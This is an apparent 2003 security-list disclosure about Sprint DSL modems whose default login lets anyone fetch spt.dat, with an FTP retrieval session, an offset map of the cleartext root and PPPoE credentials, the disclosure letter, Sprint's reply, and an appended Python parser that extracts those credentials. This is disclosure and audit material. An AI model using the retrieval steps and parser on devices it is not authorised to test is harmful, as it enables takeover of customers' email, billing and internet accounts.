FX <fx (at) phenoelit (dot) de [email concealed]> said:
> > ftp> open malware.com
> > Connected to malware.com.
> > 220 Sprint FTP version 1.0 ready at Wed Jan 5 17:20:47 2000
> > User (malware.com:(none)):
> > 331 Enter PASS command
> > Password:
> > 230 Logged in
> > ftp> get rom-0
>
> I'm not sure if this applies to the Zyxel boxes you found, but there is another
> file called spt.dat, which contains all password and account information. More
> details can be found here: http://www.DarkLab.org/archive/msg00144.html
>
> FX
Yes, FX, you are correct. After a good swift kick in the nuts, Sprint
has done and is still doing an admirable job in fixing this.
Sufficient time has elapsed to advise this.
The only additional note is to strongly suggest that the users change
their master account password as well:
<!--
Friday, January 24, 2003
Ladies and Gentlemen:
Reference the information provided to you on Monday and Tuesday of
this week and subsequent announcements on Thursday this week:
http://www.wired.com/news/infostructure/0,1377,57342,00.html
http://www.securityfocusonline.com/archive/1/307793/2003-01-22/2003-01-28/0
This message serves to inform you that your entire user base is open
to full and complete remote compromise through this modem.
This includes full access to:
1. the internet via adsl and dialup connection
2. pop3 email retrieval
3. webmail
4. web based user account management including user name and address
and billing details
The problem lies in the fact that the modem you have provided to your
user base is installed with a commonly known default login and
password. Once access has been gained to this modem, it is trivially
possible to retrieve a storage file contained within the modem which
includes the user's name and password.
With this information it is possible to access all aspects of the
user account as described above.
Example:
00000020: 1234
00000042: malst
00000060: Sprint
00000082: mal Ware
000000AC: public
000000CC: public
000000EC: public
00001086: dhcppc
00001C54: MyISP
00001DDE: grandpamalware
00001DEB: malware.
00001DFE: ware
00002112: mal
0x20   the root password in clear
0x40   SNMP Location
0x60   Device name
0x80   SNMP Sys Contact
0xac   SNMP read community
0xcc   SNMP read community
0xec   SNMP read community
0x188  SUA Server IP address
0x1c54 First PPPoE Account config name (Default: ChangeMe)
0x1dde First PPPoE Username
0x1dfe First PPPoE Password
0x21dc Second PPPoE Account config name
Where the username grandpamalware (at) malware (dot) com [email concealed] and the password ware are entered
into a dialup connection with the specific access number, they will function;
where entered into a POP3 mail client with the corresponding POP3
server, they will retrieve mail accordingly; where entered into web-based
mail access, they will allow access; and where access to
myaccount information is required, they will allow for authentication and
login.
In other words, the single user id and email address along with the
single pass all contained within the file on the modem will allow
access to everything!
The file on the modem is a small dat file called spt.dat therein, in
clear text, lies all this information.
This information is already in the public domain and you need to
urgently firewall your user base ports http, telnet, and ftp while
you solve this problem. You must assume that malicious parties are
well aware of and are probably exploiting it right now.
Today is Friday. Nothing has been done about this to date. Your
entire user base is at risk.
We expect some sort of substantial action by Tuesday latest. Failing
that, we will discuss this in technical depth on all relevant
security lists.
End Call
cc:
Wired
@pc-radio.com
Symantec
@securityfocus.com
CERT
@cert.org
Earthlink
@corp.earthlink.net
abuse (at) earthlink (dot) net [email concealed]
security (at) corp (dot) earthlink [email concealed]
Sprint
@mail.sprint.com
noc (at) sprint (dot) net [email concealed]
abuse (at) sprint (dot) net [email concealed]
security (at) sprint (dot) net [email concealed]
--
http://www.malware.com
-->
Date: Tue, 28 Jan 2003 17:01:25 -0500
<!--
Sprint is working closely with its DSL modem manufacturer to ensure the
security and integrity of its Sprint-provided DSL equipment. Sprint is
dedicated to providing its customers a secure broadband Internet
network, and to that end, recently identified an additional layer of
security that can help protect customers' DSL modems.
The company began notifying its customers - one-by-one - in a very
targeted initiative to provide guidance on ensuring their DSL service is
reliable and secure. We are consulting with our customers and walking
them through the relatively simple steps to ensure an additional layer
of security on their modem.
Proactively, we are reaching out to our customers in three different
ways - outbound telephone calls, e-mail messages and a customer letter
mailed today (Jan. 28). These communications are directed at helping
ensure the safety and security of customers' DSL modems.
Additionally, we are informing all DSL customers who call our technical
assistance group of the procedures for securing their modem.
Sprint is committed to providing safe, reliable and secure voice and
data services to all its customers. When an event occurs that threatens
that safety, reliability and security, we take it very seriously and we
will continue to do everything we can to contact our customers.
Director-Customer Operations
-->
Notes: users can address the issue here:
http://csb.sprint.com/home/local/dslhelp/release645m.html
--
http://www.malware.com
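The post above gives the cleartext layout of spt.dat as a list of fixed offsets. The following is an added example, written for this page and not code from the original post or from the modem vendor: it reads the fields at those published offsets from a file fetched the way the post shows (ftp, then get spt.dat) and flags the values a practitioner would want to change. It assumes each field is a NUL-terminated ASCII string (the post does not state the encoding, so the 0x188 SUA server IP field is skipped), and the sample spt.dat it builds is constructed here from the values in the post's dump, not a real capture.

```python
"""Parse and audit the cleartext fields of an spt.dat at the offsets given in the post.

Added example for this page; not the original post's code nor the vendor's.
The offsets come from the post's offset map. Field encoding (NUL-terminated
ASCII) and the minimum file size are assumptions, not facts from the post.
"""
import sys
from typing import Dict, List

# Field name -> file offset, as listed in the post. The SUA server IP at 0x188
# is left out because the post does not say how it is encoded.
SPT_FIELDS: Dict[str, int] = {
    "root_password": 0x20,
    "snmp_location": 0x40,
    "device_name": 0x60,
    "snmp_contact": 0x80,
    "snmp_community_1": 0xAC,
    "snmp_community_2": 0xCC,
    "snmp_community_3": 0xEC,
    "pppoe1_config_name": 0x1C54,
    "pppoe1_username": 0x1DDE,
    "pppoe1_password": 0x1DFE,
    "pppoe2_config_name": 0x21DC,
}

SPT_MIN_SIZE = 0x2200  # assumption: just enough to cover the last listed offset


def read_cstring(buf: bytes, offset: int, max_len: int = 64) -> str:
    """Return the NUL-terminated ASCII string at offset (bounded by max_len)."""
    if offset >= len(buf):
        raise ValueError(f"offset {offset:#x} is beyond the end of the file")
    end = buf.find(b"\x00", offset, offset + max_len)
    if end == -1:
        end = min(offset + max_len, len(buf))
    return buf[offset:end].decode("ascii", errors="replace")


def parse_spt(buf: bytes) -> Dict[str, str]:
    """Extract every field in SPT_FIELDS from a raw spt.dat image."""
    if len(buf) < SPT_MIN_SIZE:
        raise ValueError("file too small to hold the layout described in the post")
    return {name: read_cstring(buf, off) for name, off in SPT_FIELDS.items()}


def audit(fields: Dict[str, str]) -> List[str]:
    """Report values an operator should change before exposing the device."""
    findings = []
    for name in ("snmp_community_1", "snmp_community_2", "snmp_community_3"):
        if fields[name].lower() in ("public", "private"):
            findings.append(f"{name}: well-known SNMP community '{fields[name]}'")
    for name in ("pppoe1_config_name", "pppoe2_config_name"):
        if fields[name] == "ChangeMe":  # factory default named in the post
            findings.append(f"{name}: still the default 'ChangeMe'")
    pw = fields["root_password"]
    if len(pw) < 8 or pw.isdigit():
        findings.append("root_password: short or all-numeric")
    if fields["pppoe1_password"]:
        findings.append("pppoe1_password: ISP account password present in cleartext")
    return findings


def make_sample_spt() -> bytes:
    """Constructed sample mirroring the post's dump values; not a real capture."""
    buf = bytearray(SPT_MIN_SIZE)
    sample = {
        "root_password": "1234",
        "snmp_location": "malst",
        "device_name": "Sprint",
        "snmp_contact": "mal Ware",
        "snmp_community_1": "public",
        "snmp_community_2": "public",
        "snmp_community_3": "public",
        "pppoe1_config_name": "MyISP",
        "pppoe1_username": "grandpamalware@malware.com",
        "pppoe1_password": "ware",
        "pppoe2_config_name": "ChangeMe",
    }
    for name, value in sample.items():
        data = value.encode("ascii") + b"\x00"
        off = SPT_FIELDS[name]
        buf[off:off + len(data)] = data
    return bytes(buf)


if __name__ == "__main__":
    # Usage: python spt_audit.py spt.dat   (falls back to the constructed sample)
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else make_sample_spt()
    fields = parse_spt(raw)
    for name, value in fields.items():
        print(f"{SPT_FIELDS[name]:#06x} {name:20s} {value}")
    for finding in audit(fields):
        print("WARN", finding)
```

Run it against a real spt.dat only on a device you own or are authorised to test; the parser is deliberately strict about file size so a truncated download from a flaky modem FTP server fails loudly instead of returning empty fields.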